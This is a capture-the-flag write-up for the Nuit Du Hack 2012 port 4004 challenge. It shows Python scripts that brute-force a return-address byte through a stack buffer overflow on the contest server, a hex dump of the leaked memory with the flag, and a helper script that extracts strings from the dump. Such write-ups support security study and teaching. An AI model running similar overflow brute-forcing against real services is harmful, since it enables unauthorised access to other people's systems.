Nuit Du Hack 2012 Prequals – Port 4004 Writeup

After solving the Port 4000 challenge, I connected to the sciteek.nuitduhack.com:4004 service, which was mentioned in the flag file I was able to fetch.

The main idea is the same: it looks like the service is vulnerable to a stack-based buffer overflow. By sending 100 + 1 bytes, I am able to overwrite one byte of the return address, so I wrote another Python script to brute-force that byte:


# Python 2 script: the three request lines below add up to exactly 100 bytes,
# so the byte substituted for %s lands at position 101, on the return address.
import socket
import time

packet = """GET /AB HTTP/1.1
Host: sciteek.nuitduhack.com:4004
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0)%s"""

# try candidate values for the 101st byte (0x87 == 135)
for i in range(135,138, 2):
    print "--> i: %s" % i
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('sciteek.nuitduhack.com', 4004))
    s.send(packet % chr(i))

    # read the reply in two chunks and dump both to the console
    received = s.recv(4096)
    received2 = s.recv(4096)
    s.close()
    print "received %s bytes" % len(received)
    print received
    print "received %s bytes" % len(received2)
    print received2
    print '\n\n\n'
    time.sleep(3)  # pause between attempts

When trying with i = 0x87, the response from the server was “You are authenticated”, but there wasn’t anything else that could be interpreted as the flag for this challenge. Since that message suggested I was on the right track, I decided to keep the 0x87 byte at the 101st position of my packet and started sending 100 bytes + 0x87 + one more brute-forced byte:


import socket

# 100 filler bytes + the 0x87 byte found above, then one brute-forced byte
packet = 'A' * 100 + '\x87'

for i in range(256):
    print "--> i: %s" % i
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('sciteek.nuitduhack.com', 4004))
    s.send(packet + chr(i))

    # dump the raw reply so anything interesting shows up in the console
    received = s.recv(4096)
    s.close()
    print received

I left the new script running, and suddenly I started hearing beeps from my notebook’s speaker as the script printed the server’s response (the response contains non-printable bytes, and printing bytes such as 0x07 (BEL) raw to the console rings the terminal bell). I took a look at the cmd window and saw I had received the following response with i = 0x81 (hex dump copied from Wireshark to make it more readable, since there are a lot of non-printable characters):


00000085  03 01 01 03 02 04 02 01  00 00 04 02 02 00 00 04 ........ ........
00000095  0a 01 00 17 01 01 0a 02  0a 00 11 f2 ff 0b 02 04 ........ ........
000000A5  00 00 02 03 02 03 01 1a  01 03 01 01 03 02 01 03 ........ ........
000000B5  03 01 03 04 0e 00 03 03  04 0a 04 01 17 04 04 10 ........ ........
000000C5  13 00 18 00 03 02 1e 0c  00 04 06 00 04 0a 00 0a ........ ........
000000D5  01 0a 03 16 e3 03 04 03  03 03 02 03 01 1a 01 03 ........ ........
000000E5  00 01 03 01 04 0a 01 00  17 01 01 10 1a 00 18 01 ........ ........
000000F5  01 61 1f 0f 00 18 01 01  7a 1e 08 00 07 01 01 20 .a...... z......
00000105  04 06 00 01 0a 00 16 dc  03 01 03 00 1a 01 03 00 ........ ........
00000115  01 03 01 04 0a 01 00 17  01 01 10 1a 00 18 01 01 ........ ........
00000125  41 1f 0f 00 18 01 01 5a  1e 08 00 06 01 01 20 04 A......Z ...... .
00000135  06 00 01 0a 00 16 dc 03  01 03 00 1a 01 03 03 01 ........ ........
00000145  03 04 01 03 05 0e 00 05  05 18 00 05 02 1e 23 00 ........ ......#.
00000155  04 0a 03 00 04 0a 04 01  18 00 03 04 10 06 00 04 ........ ........
00000165  01 00 01 16 12 17 03 03  10 08 00 0a 00 0a 01 0a ........ ........
00000175  05 16 d6 0e 00 00 00 03  05 03 04 03 03 1a 01 03 ........ ........
00000185  01 01 03 02 01 03 03 01  03 04 0e 00 02 02 04 00 ........ ........
00000195  03 00 19 04 e9 fe 1d 03  00 0b 03 04 0a 01 00 17 ........ ........
000001A5  01 01 10 43 00 18 01 01  30 1f 38 00 18 01 01 39 ...C.... 0.8....9
000001B5  1e 31 00 07 01 01 30 0e  00 04 04 04 01 04 01 01 .1....0. ........
000001C5  03 03 17 03 03 10 0c 00  08 01 04 0a 0b 03 17 03 ........ ........
000001D5  03 11 f4 ff 08 00 04 01  06 00 02 04 03 03 0b 03 ........ ........
000001E5  0a 00 16 b7 0e 00 02 02  04 00 00 02 03 04 03 03 ........ ........
000001F5  03 02 03 01 1a 01 03 00  01 03 01 04 00 01 00 19 ........ ........
00000205  04 7c fe 04 00 03 00 04  00 02 01 04 01 01 01 04 .|...... ........
00000215  01 00 04 30 03 01 03 00  1a 01 03 00 01 03 03 0e ...0.... ........
00000225  00 03 03 18 00 03 02 10  0d 00 1e 0a 00 04 06 00 ........ ........
00000235  01 0a 03 0a 00 16 ec 03  03 03 00 1a 04 00 01 00 ........ ........
00000245  04 01 00 05 30 1a 04 00  02 01 04 00 01 00 04 01 ....0... ........
00000255  00 02 30 1a 04 00 03 02  04 00 02 01 04 00 01 00 ..0..... ........
00000265  04 01 00 03 30 1a 01 03  03 04 00 03 02 04 00 02 ....0... ........
00000275  01 04 00 01 00 04 01 00  11 30 03 03 1a 01 03 01 ........ .0......
00000285  01 03 02 01 03 03 01 03  04 01 03 05 04 02 01 00 ........ ........
00000295  00 19 04 b1 ff 18 02 00  ff ff 11 0f 00 0e 00 00 ........ ........
000002A5  00 03 05 03 04 03 03 03  02 03 01 1a 04 00 03 00 ........ ........
000002B5  04 02 01 00 00 04 02 02  02 00 19 04 a8 ff 04 00 ........ ........
000002C5  04 00 0a 04 04 00 00 03  04 02 01 00 00 04 02 02 ........ ........
000002D5  00 00 19 04 90 ff 07 00  08 04 04 00 05 08 04 00 ........ ........
000002E5  00 03 04 00 01 08 04 00  02 04 19 04 66 ff 06 00 ........ ....f...
000002F5  04 05 0b 04 04 07 04 00  04 00 00 05 19 04 f5 fe ........ ........
00000305  04 01 00 01 0a 04 07 00  04 05 06 00 08 04 03 05 ........ ........
00000315  03 04 03 03 03 02 03 01  1a 04 02 00 08 83 19 04 ........ ........
00000325  d3 fe 07 01 08 64 04 00  05 08 04 02 00 00 00 04 .....d.. ........
00000335  00 01 05 04 01 02 66 19  04 19 ff 04 02 00 11 11 ......f. ........
00000345  04 00 01 05 04 02 02 64  00 19 04 5b fd 06 01 08 .......d ...[....
00000355  64 1a 04 02 00 11 11 04  02 01 64 83 04 02 02 00 d....... ..d.....
00000365  01 19 04 d7 fd 11 05 00  10 9a 00 16 09 04 02 00 ........ ........
00000375  3a 83 19 04 7f fe 1a 0e  00 07 07 19 04 9a ff 19 :....... ........
00000385  04 cf ff 1c 50 61 73 73  77 6f 72 64 20 28 72 65 ....Pass word (re
00000395  71 75 69 72 65 64 29 3a  20 00 73 63 69 74 65 65 quired):  .scitee
000003A5  6b 2e 6e 75 69 74 64 75  68 61 63 6b 2e 63 6f 6d k.nuitdu hack.com
000003B5  3a 34 30 30 34 00 42 61  64 20 70 61 73 73 77 6f :4004.Ba d passwo
000003C5  72 64 2e 0a 00 59 6f 75  20 61 72 65 20 6e 6f 77 rd...You  are now
000003D5  20 61 75 74 68 65 6e 74  69 63 61 74 65 64 0a 00  authent icated..
000003E5  5a 6f 6d 66 67 53 63 69  50 61 64 57 69 6c 6c 52 ZomfgSci PadWillR
000003F5  30 78 78 44 34 46 75 63  6b 31 6e 77 30 52 4c 64 0xxD4Fuc k1nw0RLd
00000405  21 21 21 0a 00 04 02 00  49 83 19 04 e7 fd 1c 00 !!!..... I.......

So ZomfgSciPadWillR0xxD4Fuck1nw0RLd!!! should be the flag for this challenge. Unfortunately, it looks like I solved this challenge too early, before receiving the instructions for it, so I didn’t know which subject to use to send the flag to Piotr. I guess I needed to solve some previous challenge before entering this one.
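As an added example (not the author's code), here is a small Python 3 script that rebuilds the raw bytes from Wireshark hex-dump lines like the ones above and pulls out the printable strings, which is how an analyst would recover the text that was spotted by eye in the dump; the sample input is the tail of the dump above, and the minimum string length is an assumption.

```python
import re

# Sample input: the last nine lines of the Wireshark hex dump shown above
# (8-digit offset, 16 hex bytes with an extra space after the 8th, ASCII column).
DUMP = """\
00000385  04 cf ff 1c 50 61 73 73  77 6f 72 64 20 28 72 65 ....Pass word (re
00000395  71 75 69 72 65 64 29 3a  20 00 73 63 69 74 65 65 quired):  .scitee
000003A5  6b 2e 6e 75 69 74 64 75  68 61 63 6b 2e 63 6f 6d k.nuitdu hack.com
000003B5  3a 34 30 30 34 00 42 61  64 20 70 61 73 73 77 6f :4004.Ba d passwo
000003C5  72 64 2e 0a 00 59 6f 75  20 61 72 65 20 6e 6f 77 rd...You  are now
000003D5  20 61 75 74 68 65 6e 74  69 63 61 74 65 64 0a 00  authent icated..
000003E5  5a 6f 6d 66 67 53 63 69  50 61 64 57 69 6c 6c 52 ZomfgSci PadWillR
000003F5  30 78 78 44 34 46 75 63  6b 31 6e 77 30 52 4c 64 0xxD4Fuc k1nw0RLd
00000405  21 21 21 0a 00 04 02 00  49 83 19 04 e7 fd 1c 00 !!!..... I.......
"""


def parse_hexdump(text):
    """Rebuild the raw bytes from Wireshark hex-dump lines.

    The hex field is fixed width (columns 10..57), so we slice it by position
    instead of splitting the whole line: the ASCII column can legally contain
    two-character text that looks like a hex byte, and a short final line is
    space-padded by Wireshark so the slice still holds.
    """
    data = bytearray()
    for line in text.splitlines():
        if not re.match(r"[0-9A-Fa-f]{8}\s", line):
            continue  # not a dump line (blank line or stray text)
        hex_area = line[10:58]
        data.extend(int(tok, 16) for tok in hex_area.split())
    return bytes(data)


def extract_strings(data, min_len=4):
    """Return runs of printable ASCII (newline allowed), like `strings -n`.

    min_len=4 is an assumption; each run ends at the first non-printable byte
    (the service NUL-terminates its strings), and a trailing newline is dropped.
    """
    runs = re.findall(rb"[\x20-\x7e\n]{%d,}" % min_len, data)
    return [r.decode("ascii").rstrip("\n") for r in runs]


if __name__ == "__main__":
    for s in extract_strings(parse_hexdump(DUMP)):
        print(repr(s))
```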
